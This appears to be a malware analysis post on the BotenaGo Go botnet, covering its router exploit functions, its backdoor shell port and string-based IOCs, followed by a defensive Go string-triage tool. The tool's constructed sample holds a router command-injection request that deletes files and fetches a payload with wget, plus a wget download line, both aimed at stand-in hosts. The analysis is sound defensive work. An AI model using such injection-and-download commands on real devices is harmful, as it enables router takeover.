‘BotenaGo’ Malware Targets Multiple Routers with 30+ Exploit Functions and Go Reversing Analysis
Summary
On November 11, 2021, AT&T Alien Labs reported new malware written in the open-source programming language Golang. Deployed with more than 30 exploits, it had the potential to target millions of routers and IoT devices. LevelBlue Labs (the successor to AT&T Alien Labs) later published research on the malware after its code appeared on GitHub.
This post does not rely on that open-source analysis; it reverses the Go binary directly.
A growing amount of malware is now written in Go, which is a new challenge for reverse engineers.
Key points about the malware itself:
1. 30+ different exploit functions, covering different router vendors and versions
2. Support for a backdoor with telnet and a reverse shell (httpd)
3. No DDoS attack module found inside
4. Strings are stored in plain text in the binary
Analysis
BotenaGo is a botnet, but whenever we face a new sample we still have to analyze what the binary itself does.
There are many infection functions targeting vendors such as D-Link, ZTE, Tenda, Realtek and others, and several variants per vendor, e.g. DlinkTwo, DlinkThree, DlinkFour, DlinkFive, DlinkSix, DlinkSeven and DlinkEight. This shows the attacker was very familiar with the different router vendors and had researched multiple firmware versions in depth.
Figure 1 - infection functions per vendor
The 30+ exploit functions are built around HTTP GET and POST requests; the request paths in those strings are the attack paths, and the CVE each function exploits can be identified from them.
Figure 2 - GET strings for exploit functions
Figure 3 - POST strings for exploit functions
The main_scannerInitExploits routine has a very clear structure, and each infect function follows the same template, differing only in what it adds or changes.
Figure 4 - infect functions follow the same pattern
Backdoor support with a telnet loader and a reverse shell loader
Figure 5 - backdoor loader
It creates a shell bound to port 0x7AB4 (31412 decimal) and listens for incoming connections.
Figure 6 - shell port 0x7AB4
One of the malware's payload download links is shown below.
Figure 7 - payload download link
The other IOCs can be collected from the plain-text strings by searching for the keyword "wget".
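As an added example (not code from the original post and not BotenaGo's own code), the Go tool below applies the two string-based observations above: it extracts printable strings from a binary the way `strings` does, pulls the request targets out of GET/POST request lines (the attack paths behind the exploit functions), and collects wget download URLs as network IOCs. The embedded sample bytes are constructed for this example; the paths, URLs and hosts (RFC 5737 documentation addresses) are invented stand-ins, not real IOCs from the sample.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"sort"
)

// sampleBinary is a constructed stand-in for the bytes of a dumped sample:
// printable request lines and a wget command separated by non-printable bytes.
// It is not data from a real BotenaGo binary.
var sampleBinary = []byte("\x00\x01garbage\x7f" +
	"GET /setup.cgi?todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.0.2.10/x86 HTTP/1.1\r\n\x00" +
	"POST /goform/formLogin HTTP/1.1\r\nHost: 127.0.0.1\x00\x02\x03" +
	"wget http://198.51.100.7/bins/mips.bot\x00z\x00/bin/sh\x00")

// Findings groups what the triage pass recovered from the plain-text strings.
type Findings struct {
	ExploitPaths map[string][]string // HTTP method -> request targets used by exploit functions
	DownloadURLs []string            // payload URLs fetched with wget (network IOCs)
	Hosts        []string            // unique hosts taken from those URLs
}

var (
	// A request line such as "GET /setup.cgi?... HTTP/1.1" at the start of a string.
	reqLineRe = regexp.MustCompile(`^(GET|POST) (\S+) HTTP/1\.[01]`)
	// "wget http://..." or its URL-encoded form "wget+http://..." inside an injected command.
	wgetRe = regexp.MustCompile(`wget[+ ]+(https?://[^\s;&"'+]+)`)
)

// extractStrings behaves like `strings -n minLen`: it returns every run of
// printable ASCII bytes (0x20..0x7e) that is at least minLen bytes long.
func extractStrings(data []byte, minLen int) []string {
	var out []string
	var cur []byte
	flush := func() {
		if len(cur) >= minLen {
			out = append(out, string(cur))
		}
		cur = cur[:0]
	}
	for _, b := range data {
		if b >= 0x20 && b <= 0x7e {
			cur = append(cur, b)
			continue
		}
		flush()
	}
	flush()
	return out
}

// uniqueSorted deduplicates and sorts so results are stable for reporting and diffing.
func uniqueSorted(in []string) []string {
	set := make(map[string]struct{}, len(in))
	for _, s := range in {
		set[s] = struct{}{}
	}
	out := make([]string, 0, len(set))
	for s := range set {
		out = append(out, s)
	}
	sort.Strings(out)
	return out
}

// Triage extracts strings from the binary and pulls out exploit request
// targets (from GET/POST request lines) and wget download URLs.
func Triage(data []byte) Findings {
	f := Findings{ExploitPaths: map[string][]string{}}
	var urls []string
	for _, s := range extractStrings(data, 6) {
		if m := reqLineRe.FindStringSubmatch(s); m != nil {
			f.ExploitPaths[m[1]] = append(f.ExploitPaths[m[1]], m[2])
		}
		// A request line can itself carry a wget in its injected command, so scan every string.
		for _, m := range wgetRe.FindAllStringSubmatch(s, -1) {
			urls = append(urls, m[1])
		}
	}
	for method, paths := range f.ExploitPaths {
		f.ExploitPaths[method] = uniqueSorted(paths)
	}
	f.DownloadURLs = uniqueSorted(urls)
	var hosts []string
	for _, raw := range f.DownloadURLs {
		if u, err := url.Parse(raw); err == nil && u.Hostname() != "" {
			hosts = append(hosts, u.Hostname())
		}
	}
	f.Hosts = uniqueSorted(hosts)
	return f
}

func main() {
	f := Triage(sampleBinary)
	for _, method := range []string{"GET", "POST"} {
		for _, p := range f.ExploitPaths[method] {
			fmt.Printf("exploit %-4s %s\n", method, p)
		}
	}
	for _, u := range f.DownloadURLs {
		fmt.Println("download", u)
	}
	for _, h := range f.Hosts {
		fmt.Println("host", h)
	}
}
```

Run it with `go run`; for a real sample, replace sampleBinary with the bytes returned by os.ReadFile on the dumped binary. Because the malware stores its strings in plain text, this pass recovers the attack paths and download hosts without any decryption step; on a suspected infected device, a process listening on TCP port 31412 is a complementary quick check.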
End.